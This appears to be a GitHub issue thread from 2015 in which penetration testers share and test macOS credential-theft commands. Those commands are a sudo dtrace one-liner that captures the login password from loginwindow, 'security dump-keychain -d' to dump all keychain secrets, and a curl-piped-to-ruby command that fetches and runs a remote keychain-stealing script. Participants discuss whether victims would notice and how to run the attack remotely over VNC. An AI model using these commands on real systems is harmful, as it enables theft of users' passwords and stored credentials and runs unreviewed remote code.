Open WebBreacher opened 9 years ago
This is what I get:
dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system
:cry: System info:
$ uname -a ⏎
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
@OJ - It was on Twitter so it has to be true!
Seriously though, the first command appears to work on my MBP:
└──> $ sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') dtrace: description 'pid$target::SecKeychainLogin:entry' matched 1 probe
And the second (dump the keychain) works too but pops up a "do you want this app to access your keychain" prompt for each cred that is being dumped. I'm VERY sure that users/victims will notice this.
└──> $ uname -a Darwin c02kj19lfft4.home 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
hehe yeah sorry mate. I wasn't implying that it was you. I think it might rely on Yosemite (I'm still on Mavericks).
Fun stuff though!
No worries....good to know where it does/does not work too. I'm on 10.9.5 OS X
Curl https://raw.githubusercontent.com/erran/keyjacker/master/keyjacker.rb | ruby
Co worker Erran wrote this when he was like 16 or so. Still works pretty well on assessments. Again you need to click allow which means you need gui access but I have pulled that off remotely with vnc. Not super stealthy but gets the job done.
Leon Johnson
On Jun 25, 2015, at 6:48 AM, OJ Reeves notifications@github.com wrote:
This is what I get:
dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system
System info:
$ uname -a ⏎ Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64 — Reply to this email directly or view it on GitHub.
Don't have time to add this in the appropriate place:
_sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[RECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') (from https://twitter.com/fel1x/status/613420320104558592)
Dump whole OS X keychain: security dump-keychain -d login.keychain > keychain.txt && srm keychain.txt